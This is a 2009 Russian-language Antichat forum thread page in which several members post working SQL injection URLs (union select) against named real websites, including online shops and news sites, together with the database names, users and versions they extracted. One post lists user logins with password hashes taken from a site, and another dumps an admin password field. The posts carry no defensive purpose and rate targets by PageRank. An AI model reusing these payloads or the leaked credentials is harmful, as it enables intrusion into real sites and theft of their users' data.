ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9151  
Старый 04.05.2009, 10:46
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.otoplenie.eu/php/firm_profiles.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,data base(),user(),ver sion()),8,9,10,11,12,13,14,15,16,17,18,19,20,21--

otopleni_otoplenietopleni_otoplen@localhost:5.0. 67-community

------------------------------------------------------------------------
http://travelexpresbg.com/page.php?id=-1+union+select+1,concat_ws(0x3a,dat abase(),u ser(),versi on())--

travelex_te:travelex_te@localhost:5.0.67-community-log

Последний раз редактировалось HAXTA4OK; 04.05.2009 в 10:51..
 
Ответить с цитированием

  #9152  
Старый 04.05.2009, 10:55
BlackPanther
Новичок
Регистрация: 19.04.2009
Сообщений: 15
Провел на форуме:
139497

Репутация: 10
По умолчанию

Продолжаем тему шоп-
Код:
http://www.vostart.com/web/eng/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
 
Ответить с цитированием

  #9153  
Старый 04.05.2009, 11:56
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 4]
Код:
http://www.wedasoft.at/en/product.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
4.1.15-Debian_0.dotdeb.4-log:wedasoft:wedas@localhost

[PR 3]
Код:
http://zonadostupa.ru/product.php?id=5814+union+select+concat_ws(0x3a,version(),database(),user())
4.1.22-log:wwwzonadostuparu:zonado02@fe30.hc.ru
 
Ответить с цитированием

  #9154  
Старый 04.05.2009, 12:20
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.arcadi.fr/rendezvous/rv.php?id=-1'+union+select+1,2,concat_ws(0x3a,database(),use r(),versio n()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23/*

arcadi_web2:arcadi_web2@bizmachine8.co.fr.clara.ne t:5.0.33-log

PR: 6
 
Ответить с цитированием

  #9155  
Старый 04.05.2009, 13:01
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
Arrow

Target: www.racingimages.cc

Evil link: http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,5,6,7/*

Database info:
user: racingimages@localhost
database: racingimages
version: 4.1.22-standard



Users (http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,concat_ws(0x3a,login,pas sword),6,7+from+user/*)
vmt:$1$lNZVfFdL$10UMAm9L.FzCOax66mCJq/
lauri:$1$bNYsaYKl$BQPISnslvc2/5rC1G.XrO0
matti:$1$kMifYQzs$.JSbo5Wzyl2gfpJ79HF7J/


Админку не нашёл

Последний раз редактировалось InFlame; 04.05.2009 в 13:04..
 
Ответить с цитированием

  #9156  
Старый 04.05.2009, 13:04
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Хип-Хоп портал

www.hiphopbase.ru

Код:
http://hiphopbase.ru/HipHopBase.php?site_page=111&id=-663+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11--
hiphopb4@localhost:4.1.22-log:hiphopb4_hhbasedb
PR:1
ТиЦ:10
 
Ответить с цитированием

  #9157  
Старый 04.05.2009, 14:52
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.taxi-control.ru/index.php?id=-1+union+select+1,concat_ws(0x3a,database(),use r(),versio n()),3--

taxicontrol:taxicontrol@zvm4.host.ru:4.0.27-log
 
Ответить с цитированием

  #9158  
Старый 04.05.2009, 15:18
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.sportstarmanagement.com PR 5
Код:
http://www.sportstarmanagement.com/News.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/*
4.1.22-standard:sportsta_sportstardb:sportsta_sportst@loc alhost
 
Ответить с цитированием

  #9159  
Старый 04.05.2009, 15:39
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.lordsofmetal.nl/crew.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19
mblofmetal_lom@localhost:mblofmetal_lom:5.0.51a-community-log

Код:
http://www.bulfurniture.com/php/products.html?id=1
Blind

Юзер: bulfurniture@localhost
БД: bulfurniture
Версия: 4.0.24_Debian-10sarge3-log

Чтобы достать юзера, бд и версию, понадобилось 90 мб траффика.
 
Ответить с цитированием

so little shops
  #9160  
Старый 04.05.2009, 17:51
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
Unhappy so little shops

Цитата:
_http://www.hunt-shop.ru/info.php?id=-24940+union+select+1,2,3,4,pass,6,7,8,9+from+admin--
{print in title}
4.0.27-log:hunt-shop@zvm13.host.ru:hunt-shop
Adminassword



Цитата:
_http://www.sport-timing.sk/shop/index.php?way=Tovar&goods_id=-470+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a,version(),user(),database()),12,13,14,15,16--+
5.1.24-rc:sporttiming@localhost:sporttiming



Цитата:
_http://www.toddycafe.com/shop/product.php?productId=-67'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat _ws(0x3a,version(),user(),database()),14,15,16,17--+
5.0.37-community:toddycafe@localhost:toddycafe



Цитата:
_http://www.antiqueshop.ee/icons/aikon.php?id=-109+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database())--
5.0.67-log:virt1393usr@z136.zone.ee:virt1393



Цитата:
_http://www.santa.su/shop/?dir=1&pid=683'+union+select+concat_ws(0x3a,versio n(),user(),database()),2,3,4,5--%20-
{print in source}
5.0.45:santa_su@localhost:db_santa_su

Последний раз редактировалось S00pY; 04.05.2009 в 18:00..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ